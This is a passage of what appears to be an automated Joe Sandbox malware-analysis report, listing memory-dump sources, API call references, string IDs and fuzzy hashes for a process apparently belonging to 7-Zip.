• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: fputs$freememset
• String ID: ERROR: $WARNING:
• API String ID: 2276422817-2114518728
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: CriticalSection$EnterLeavefputs
• String ID: ERROR:
• API String ID: 4171338575-977468659
APIs
• fputs.MSVCRT ref: 0021BC6C
• free.MSVCRT ref: 0021BC78
  • Part of subcall function 0021B1C8: memset.MSVCRT ref: 0021B20D
  • Part of subcall function 0021B1C8: fputs.MSVCRT ref: 0021B232
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: fputs$freememset
• String ID: Archive size: $Files read from disk
• API String ID: 2276422817-3736835528
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID:
• String ID: a$z
• API String ID: 0-4151050625
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: RtlGetVersion$ntdll.dll
• API String ID: 1646373207-1489217083
APIs
• fputs.MSVCRT ref: 0021BACF
• fputs.MSVCRT ref: 0021BAFC
  • Part of subcall function 001D2320: free.MSVCRT ref: 001D237E
  • Part of subcall function 001D2320: fputs.MSVCRT ref: 001D23B8
  • Part of subcall function 001D2320: free.MSVCRT ref: 001D23C4
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$free
                                                                                                                                                                                                                                • String ID: Open archive: $StdOut
                                                                                                                                                                                                                                • API String ID: 3873070119-2401103298
                                                                                                                                                                                                                                • Opcode ID: 5c408db9bf12223247ae41b3a4b257e588f5b2f357ad56df3248e673553bd93f
                                                                                                                                                                                                                                • Instruction ID: 0d3895122f093827a3c8b3cfeee3492c6a8879dca11db147bf63963345916f59
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c408db9bf12223247ae41b3a4b257e588f5b2f357ad56df3248e673553bd93f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4F05EA531488591CE419F26DA893AD6371FB68FD4F58D432CD1E4B718DF28C499C310
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: fputs$fputc
• String ID: $:
• API String ID: 1185151155-4041779174
• Opcode ID: 0876c551c5b7590e0ff57701a7544b73fa63f79d82255e9a5707c5629e0c0e90
• Instruction ID: 64716845605c713fcee0d6d39816e2ec03fefc58e2f6b994b510b72af45ac326
• Opcode Fuzzy Hash: 0876c551c5b7590e0ff57701a7544b73fa63f79d82255e9a5707c5629e0c0e90
• Instruction Fuzzy Hash: 4CE06DA6304A8091CB159B26E95839DA321FBA9FCCF489122EE9E07719DF2CC108C711
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetLargePageMinimum$kernel32.dll
• API String ID: 1646373207-2515562745
• Opcode ID: 9cafdcdec884bdbcba65c699ecbd7ef866ca1a9750535094873ebbbe4fc89029
• Instruction ID: ed937d36f5863f28f842cc7e041fb46f47b3dd0e4aaee48b02344657f2a529d5
• Opcode Fuzzy Hash: 9cafdcdec884bdbcba65c699ecbd7ef866ca1a9750535094873ebbbe4fc89029
• Instruction Fuzzy Hash: FCE0BF35766B02E1EE45DF55FD993A423A1BBA5704FD40539891E52360EF3CC255C350
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$ErrorLast
• String ID:
• API String ID: 408039514-0
• Opcode ID: d7c40869ad587d79d1a4cde6791f56a7827730960875fe2f1716f54cae6806b2
• Instruction ID: ee98c565c6fc32391576f2e3228266d3570549dccee02e5b81267ad3a47b5904
• Opcode Fuzzy Hash: d7c40869ad587d79d1a4cde6791f56a7827730960875fe2f1716f54cae6806b2
• Instruction Fuzzy Hash: 15816932629B4186CB24DF25D48071EB775F798BA4F544226EF9E43BA9EF38D861C700
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 735d4e83ff881ba3abcc4a6c9aa5d61f64a5c4c51b6bddb4a0ec876fb6e64911
• Instruction ID: 295761ce59e2f7fa56d975152b7eb349f8edd0a212f3f3f4f17cff86fa28ac44
• Opcode Fuzzy Hash: 735d4e83ff881ba3abcc4a6c9aa5d61f64a5c4c51b6bddb4a0ec876fb6e64911
• Instruction Fuzzy Hash: 7141C227715AC097CB30DE23E54026E6761FBA6BE4F489222EFAA07B59DF38D545C700
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$memmove
• String ID:
• API String ID: 1534225298-0
• Opcode ID: 2d6c9dfe1155a16f3a068d7370a8ec758800c3918b65cbcdfef43df97f9f1dc5
• Instruction ID: f4a7b8aed6f72368ee8000346e731a6e50f23dd77ad95d2ee005f86b5903b68c
• Opcode Fuzzy Hash: 2d6c9dfe1155a16f3a068d7370a8ec758800c3918b65cbcdfef43df97f9f1dc5
• Instruction Fuzzy Hash: 4B41EA672187C085C720EA25E48015FAFB1F3D6798F184115FF9607B9AC7BED099CB11
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$ErrorLastmemmove
• String ID:
• API String ID: 3561842085-0
• Opcode ID: 835e30b8a2ce9afd242e3c27a4bd6d2521a716217a04de116505d45ba31023b0
• Instruction ID: 8f9f8ceb89779f2edd0fb8da7e5d9084c817c78f926cb176217c6fdf524f4a21
• Opcode Fuzzy Hash: 835e30b8a2ce9afd242e3c27a4bd6d2521a716217a04de116505d45ba31023b0
• Instruction Fuzzy Hash: 61318172224B4191CB60DF24E49025E7770FBA9BA4F945222FBAE47BA9DF38C559C700
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$memmove
• String ID:
• API String ID: 1534225298-0
• Opcode ID: 9a39179057fc4b698db1469c34720306d33abb4d3d1416dbc86e8f68b6a95521
• Instruction ID: 0be7a525bf66ea9a3b62cb3f8eab79c4901bc9763dfa07068e027d59f5fcd82b
• Opcode Fuzzy Hash: 9a39179057fc4b698db1469c34720306d33abb4d3d1416dbc86e8f68b6a95521
• Instruction Fuzzy Hash: 3421C13271178497CA14EF5AE9842297360F764BE4B08823AEF3E0B795DF34D962C310
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: memcmp
• String ID:
• API String ID: 1475443563-0
• Opcode ID: 712599938bbeffd81504be00bb0ea2eb8721062aa4075a36f0ea6c542d0c478b
• Instruction ID: 0df09e65fac8ff61f46467e25da4d2920a87805bdfc6f862321cc6ce14e5417f
• Opcode Fuzzy Hash: 712599938bbeffd81504be00bb0ea2eb8721062aa4075a36f0ea6c542d0c478b
• Instruction Fuzzy Hash: 111102B2308742A1EF089F66DC653E82365DB19FC4F868826CE099B305EF38CE95C744
APIs
• MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 001D3C2A
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 001D3C36
• _CxxThrowException.MSVCRT ref: 001D3C54
• MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 001D3C80
• _CxxThrowException.MSVCRT ref: 001D3C9E
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: ByteCharExceptionMultiThrowWide$ErrorLast
• String ID:
• API String ID: 2296236218-0
• Opcode ID: 970d5cdc5d485172c45e5e67665dade64923c0f4ace1f899d0aee1bf120422e8
• Instruction ID: 4bce730eb5de8843d289b3deecd762786e632394a291639ce8ad96b97338df40
• Opcode Fuzzy Hash: 970d5cdc5d485172c45e5e67665dade64923c0f4ace1f899d0aee1bf120422e8
• Instruction Fuzzy Hash: 4021DFB2700B4886DB20DF26E85475EB7A0FB98F88F448126DE9C83724EF38C945C700
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: bfe4f0f55ee913568f211c4fbf308b9aee0fbd2fe155706c5642a99402e277d4
• Instruction ID: ba2e3bc96a076f31311bf6e10e5b97213f3497eb66befcd80f87fc54c8590a2b
• Opcode Fuzzy Hash: bfe4f0f55ee913568f211c4fbf308b9aee0fbd2fe155706c5642a99402e277d4
• Instruction Fuzzy Hash: 25018023702A54A6DA24EF26D9105A92320F7A6FA4B1C8322EF7D17794CF34E852C350
APIs
• free.MSVCRT ref: 001F3877
  • Part of subcall function 001F0BBC: free.MSVCRT ref: 001F0BCC
  • Part of subcall function 001F0BBC: free.MSVCRT ref: 001F0BD5
  • Part of subcall function 001F0BBC: free.MSVCRT ref: 001F0C00
  • Part of subcall function 001F0BBC: free.MSVCRT ref: 001F0C08
  • Part of subcall function 001F1474: free.MSVCRT ref: 001F14A6
  • Part of subcall function 001F1474: free.MSVCRT ref: 001F14AF
  • Part of subcall function 001F1474: free.MSVCRT ref: 001F14B8
  • Part of subcall function 001F1474: free.MSVCRT ref: 001F14C0
• free.MSVCRT ref: 001F3892
• free.MSVCRT ref: 001F389B
• free.MSVCRT ref: 001F38C6
• free.MSVCRT ref: 001F38CE
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 18ccfc5564c15e61a23e9604fa5b251626cea37ac211422c809096770ce5a63d
• Instruction ID: 09f9e93202f4667df54a7e170405e46d344aa19fa150ed50c46844f03112dd34
• Opcode Fuzzy Hash: 18ccfc5564c15e61a23e9604fa5b251626cea37ac211422c809096770ce5a63d
• Instruction Fuzzy Hash: A7F08123B12854A6CA15FE26DD5117C2320FBA5FD070D8262EF2D4B751DF20D9628350
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: c213d67050506c93901002ddd1084c0dd65243c9eb9d617befeb87ee319482a8
                                                                                                                                                                                                                                • Instruction ID: 09cb82c53952a84fd86934e602d49bba556e6cb3398e8c740a5a7118102067e2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c213d67050506c93901002ddd1084c0dd65243c9eb9d617befeb87ee319482a8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0FF0301371199889CA20EE26DD911A86330AFB6BE871C8172FF2E47755EF30D8528360
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: f7456f4712a6592163503973d257ef0995b2ed4d21bfa0f5baa221aafdf9fe8c
                                                                                                                                                                                                                                • Instruction ID: fdb598ffcd2f92334bfdc8e2004d8707f4dfd23a048b7ac3efad942da4dafa84
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f7456f4712a6592163503973d257ef0995b2ed4d21bfa0f5baa221aafdf9fe8c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6EF096537015888DCA10EE26DD812682320AF75BA9B1C8572FF2D07755EF30D8928350
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 99aac3ebba39b973ad56ba9f7cc64fb651a8512a5e29eea15e4582f1b066fd79
                                                                                                                                                                                                                                • Instruction ID: d928e0200b7e25659b0003a04a07eeb3025866b8182916e1b35d10b9ff5e9dfe
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99aac3ebba39b973ad56ba9f7cc64fb651a8512a5e29eea15e4582f1b066fd79
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7F01D237119848A8A25AE26DD5116C6334EBF5F9871D8172EF3D4B759DF30D8428350
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • free.MSVCRT ref: 002176AF
                                                                                                                                                                                                                                • free.MSVCRT ref: 002176BB
                                                                                                                                                                                                                                • free.MSVCRT ref: 002176C7
                                                                                                                                                                                                                                • free.MSVCRT ref: 002176D3
                                                                                                                                                                                                                                  • Part of subcall function 0021B310: free.MSVCRT ref: 0021B335
                                                                                                                                                                                                                                  • Part of subcall function 0021B310: free.MSVCRT ref: 0021B342
                                                                                                                                                                                                                                  • Part of subcall function 0021B310: free.MSVCRT ref: 0021B34E
                                                                                                                                                                                                                                  • Part of subcall function 0021B310: free.MSVCRT ref: 0021B358
                                                                                                                                                                                                                                  • Part of subcall function 0021B310: free.MSVCRT ref: 0021B362
                                                                                                                                                                                                                                  • Part of subcall function 0021B310: free.MSVCRT ref: 0021B36C
                                                                                                                                                                                                                                  • Part of subcall function 0021B310: free.MSVCRT ref: 0021B376
                                                                                                                                                                                                                                  • Part of subcall function 0021B310: free.MSVCRT ref: 0021B380
                                                                                                                                                                                                                                • free.MSVCRT ref: 002176E4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 80021553301d9a40d6bbe7854cc860826636cb7fafc5824219d75b22b7ddba10
                                                                                                                                                                                                                                • Instruction ID: ca881fff03346b9bd08d2748243965a753276e034a0b071e0f75fff1c42cddd9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80021553301d9a40d6bbe7854cc860826636cb7fafc5824219d75b22b7ddba10
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57E0C93222198081CA51EF35C8951EC2370E7B9B58F1C4172EA3E8E362DF20D9938760
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionThrow$memmove
                                                                                                                                                                                                                                • String ID: Internal collision in update action set
                                                                                                                                                                                                                                • API String ID: 265668421-2378581463
                                                                                                                                                                                                                                • Opcode ID: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
                                                                                                                                                                                                                                • Instruction ID: 5e70426c5e87755d40586272cfae8c5d8340a8b2ab46e717c58b4155413cf28d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 124126323286858ADB24CF19E49479E7790F3A978CF448115EF8907B58D7B9D9E5CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • free.MSVCRT ref: 00206E91
                                                                                                                                                                                                                                  • Part of subcall function 001D3518: free.MSVCRT ref: 001D3551
                                                                                                                                                                                                                                  • Part of subcall function 001D3314: memmove.MSVCRT ref: 001D3339
                                                                                                                                                                                                                                • free.MSVCRT ref: 00206E83
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$memmove
• String ID: exe
• API String ID: 1534225298-1801697008
